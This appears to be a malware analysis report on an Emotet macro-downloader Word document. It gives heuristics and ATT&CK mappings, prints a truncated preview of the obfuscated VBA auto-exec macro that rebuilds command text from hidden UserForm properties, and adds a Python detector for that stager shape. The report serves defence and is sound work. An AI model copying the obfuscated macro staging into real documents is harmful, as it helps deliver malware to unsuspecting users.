Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV as Doc.Downloader.Emotet-7451722-0. High-severity heuristics confirm VBA macros: a Document_Open auto-exec macro that calls CreateObject and rebuilds its command text from hidden UserForm properties. That is the shape of a macro downloader that fetches and executes a second-stage payload, a common Emotet tactic. Note that every finding below is macro-based execution; the stager heuristic explicitly found no Office exploit primitive, so the T1203 (Exploitation for Client Execution) mapping above is not supported by this report's evidence, while T1059.005 is.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-7451722-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7451722-0.
- VBA macros detected (medium; OLE_VBA_MACROS; 4 related findings): the document contains VBA macro code.
- VBA UserForm hidden-property command stager (critical; OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): a VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high; OLE_VBA_DOCOPEN): a Document_Open auto-exec macro is present.
- CreateObject call (high; OLE_VBA_CREATEOBJ): the macro calls CreateObject.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info; EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI found in ordinary Office files, not a download or C2 address.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9574 bytes |
SHA-256 of macros.bas: dfe5696cd0e58c0334bb6aa1963253cefcfbbfa11e6995277b0b49169ef11ac2
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Bprzcubosb"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Avqrznti, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select _
Case Imvnqslipf
Case 233
Tpxfxnjhjdztq _
= Cos _
(949)
Krhebouas = Atn(128)
Hlotvdqw _
= Cos(613)
Case 696
Djiedzaen = Atn(931)
Mnbqhbfkzpflx _
= 964
Tqiwcugxgizzx = CDate _
(195)
Case 691
Vfsduymdoblm = _
CInt(524)
Yylyggkwrzcg = Log(Iichwgtzttlz)
Turhhgikna = Izotanisu
End Select
Select _
Case Zbqvevzw
Case 12
Xdirsdewbcnhh _
= Cos _
(915)
Gurngwbkm = Atn(577)
Moxitbsiijpb _
= Cos(607)
Case 371
Evhsostupx = Atn(411)
Ipzvtvrbqq _
= 587
Jloynwrsveca = CDate _
(819)
Case 40
Yhxszahktcjm = _
CInt(664)
Kurnwojceugs = Log(Nenzbbxjd)
Ylyslpbfyibn = Fivddmgt
End Select
Select _
Case Ctkmsmhnineo
Case 909
Xfjkalysbbao _
= Cos _
(480)
Yjvbshlcvfil = Atn(687)
Mhngdkuo _
= Cos(133)
Case 444
Estjsile = Atn(495)
Ozsdvriukeb _
= 843
Vguouktzkjr = CDate _
(377)
Case 930
Nbkmueck = _
CInt(545)
Ojkmbzdvcpe = Log(Xuqtpoep)
Vdhkxkxmd = Fekyrzgopgvp
End Select
Ifqzldfozcucj
End Sub
Attribute VB_Name = "Gqbnhzja"
Attribute VB_Base = "0{13A9E500-D973-4AAA-8FE4-84C885845AB8}{4A740EF4-CFE2-484B-B465-240E7FED0D0A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bvtsdxmou"
Function Jqucngqdeddco()
Select _
Case Kvkalxoze
Case 24
Sazrbahwtll _
= Cos _
(84)
Bqzcfkfmnvt = Atn(229)
Tgtlqgllmvxi _
= Cos(433)
Case 398
Hajsykvyv = Atn(995)
Tuobfeftjg _
= 282
Ivezepub = CDate _
(572)
Case 933
Gxlecvnwul = _
CInt(268)
Xmxjgqsokxhxb = Log(Lqjavsioqpbc)
Nmphiyrbv = Jeziqocf
End Select
Lsmlpdhdvfdj = Bprzcubosb.Avqrznti
Select _
Case Hdbnjuwdsmmm
Case 347
Rpdqmeccajh _
= Cos _
(742)
Cmsstunlmhbj = Atn(990)
Hytwnnxxwh _
= Cos(417)
Case 202
Nrecrgvct = Atn(707)
Tsscgfhc _
= 829
Tvehntbufp = CDate _
(930)
Case 939
Phwgjqvoar = _
CInt(267)
Zdvkrrpfzvuva = Log(Mthobpgdk)
Wrhsibgfhjxqc = Fntnbgolivtdn
End Select
Yilwpffq = Lsmlpdhdvfdj + Gqbnhzja.Vifeshixjhic + Gqbnhzja.Hxhvfmsr + Gqbnhzja.Ftezbityhqemf
Select _
Case Lejgwhzomb
Case 793
Butluomjjqh _
= Cos _
(607)
Gzyqamqcgier = Atn(348)
Vdcvfhobecu _
= Cos(987)
Case 625
Hpbuxemqibymo = Atn(731)
Vmouxarggvb _
= 231
Euwwxnjmf = CDate _
(669)
Case 722
Mkyncejqq = _
CInt(884)
Snzfypjuz = Log(Hmnebobhb)
Hinbeeblkgexc = Rptdknlecmzxd
End Select
Ynrkhpoq = Yilwpffq + Gqbnhzja.Znsbwwmldcicx + Gqbnhzja.Aehcchsevrp.ControlTipText
Select _
Case Bsrpkccvcjxbr
Case 552
Yxjpevwol _
= Cos _
(92)
Oqvdacvjaai = Atn(806)
Dvtjmdizgy _
= Cos(690)
Case 169
Gmxbfegrtomay = Atn(228)
Ghlhqnamjcmc _
... (truncated)
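The stager heuristic above describes a shape rather than a byte signature, and the preview shows why: nearly every line is Select Case padding built from Cos/Atn/CDate/CInt/Log calls and bare assignments, with the live chain (the read of Bprzcubosb.Avqrznti and the Gqbnhzja form properties) buried in between. The following Python is an added example written for this page, not the analyzer's own heuristic and not part of oletools. It joins VBA line continuations, drops Select Case blocks that consist only of padding, and then looks for the heuristic's indicators on what remains: an auto-exec entry point, reads of ControlTipText/Tag/Pages/HelpContextId, Split/Join, and a CreateObject whose argument is a variable rather than a string literal. The embedded SAMPLE is a constructed miniature modeled on the preview; its Join/Split and CreateObject(Zcmd) tail is assumed from the heuristic text, since the preview is truncated before that point, and BENIGN is a constructed control.

```python
"""Added example (not the analyzer's heuristic, not oletools code): flag the
hidden-UserForm command-stager shape in decoded VBA source such as macros.bas."""
import re

# Auto-exec entry points Office runs without user interaction.
AUTOEXEC = re.compile(r"^(?:Private\s+|Public\s+)?Sub\s+"
                      r"(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\s*\(", re.I | re.M)
# CreateObject whose argument is a variable (a decoded ProgID), not a literal.
CREATEOBJECT_VAR = re.compile(r"\bCreateObject\s*\(\s*([A-Za-z_]\w*)\s*\)", re.I)
SPLIT_JOIN = re.compile(r"\b(?:Split|Join)\s*\(", re.I)
# UserForm properties abused as string storage for the command text.
FORM_PROPS = re.compile(r"\.(ControlTipText|Tag|Pages|HelpContextId)\b", re.I)
# Dead-code padding as in the preview: Select Case blocks whose bodies are only
# numeric Case labels and throw-away Cos/Atn/CDate/CInt/Log assignments.
SELECT_OPEN = re.compile(r"^Select\s+Case\s+\w+$", re.I)
SELECT_END = re.compile(r"^End\s+Select$", re.I)
JUNK = (re.compile(r"^Case\s+\d+$", re.I),
        re.compile(r"^\w+\s*=\s*(?:Cos|Atn|CDate|CInt|Log)\s*\(\s*\w*\s*\)$", re.I),
        re.compile(r"^\w+\s*=\s*\w+$"))

def join_continuations(src: str) -> list[str]:
    # Merge VBA ' _' line continuations so that one statement is one line.
    out, buf = [], ""
    for raw in src.splitlines():
        line = raw.strip()
        if line.endswith("_") and (len(line) == 1 or line[-2].isspace()):
            buf += line[:-1].rstrip() + " "
            continue
        stmt = (buf + line).strip()
        buf = ""
        if stmt:
            out.append(stmt)
    return out

def strip_junk_selects(lines: list[str]) -> list[str]:
    """Drop Select Case ... End Select blocks made entirely of padding."""
    out, i = [], 0
    while i < len(lines):
        if SELECT_OPEN.match(lines[i]):
            j = i + 1
            while j < len(lines) and not SELECT_END.match(lines[j]):
                j += 1
            body = lines[i + 1:j]
            if j < len(lines) and body and all(any(p.match(b) for p in JUNK) for b in body):
                i = j + 1  # skip the dead block, End Select included
                continue
        out.append(lines[i])
        i += 1
    return out

def analyze(vba_source: str) -> dict:
    """Return the live statements plus the indicators behind a stager verdict."""
    stmts = join_continuations(vba_source)
    live = strip_junk_selects(stmts)
    text = "\n".join(live)
    autoexec = AUTOEXEC.findall(text)
    co_var = CREATEOBJECT_VAR.findall(text)
    props = sorted({p.lower() for p in FORM_PROPS.findall(text)})
    split_join = bool(SPLIT_JOIN.search(text))
    return {
        "autoexec": autoexec,
        "createobject_from_variable": co_var,
        "split_join": split_join,
        "form_props": props,
        "junk_statements_removed": len(stmts) - len(live),
        "live": live,
        # The heuristic's shape: auto-exec + CreateObject(variable) + text rebuilt via Split/Join or form props.
        "stager": bool(autoexec and co_var and (split_join or props)),
    }

# Constructed miniature modeled on the preview above. The Split/Join and
# CreateObject tail is assumed from the heuristic text; the preview is truncated.
SAMPLE = '''\
Attribute VB_Name = "Bprzcubosb"
Private Sub Document_open()
Select _
Case Imvnqslipf
Case 233
Tpxfxnjhjdztq _
= Cos _
(949)
Turhhgikna = Izotanisu
End Select
Ifqzldfozcucj
End Sub
Function Ifqzldfozcucj()
Lsmlpdhdvfdj = Bprzcubosb.Avqrznti
Ynrkhpoq = Lsmlpdhdvfdj + Gqbnhzja.Aehcchsevrp.ControlTipText + Gqbnhzja.Aehcchsevrp.Tag
Zcmd = Join(Split(Ynrkhpoq, "|"), "")
Set Obj = CreateObject(Zcmd)
End Function
'''

# Constructed benign control: auto-exec with a literal ProgID, nothing rebuilt.
BENIGN = '''\
Private Sub Document_Open()
Set fso = CreateObject("Scripting.FileSystemObject")
End Sub
'''
```

Run analyze() over the full macros.bas and the "live" list is what is worth reading: the padding patterns visible in the preview are removed and the form-property reads remain. The verdict deliberately requires CreateObject with a variable argument; a Document_Open that only builds a literal ProgID (the BENIGN control) trips the auto-exec and CreateObject indicators but not the stager shape, which is the distinction the heuristic draws.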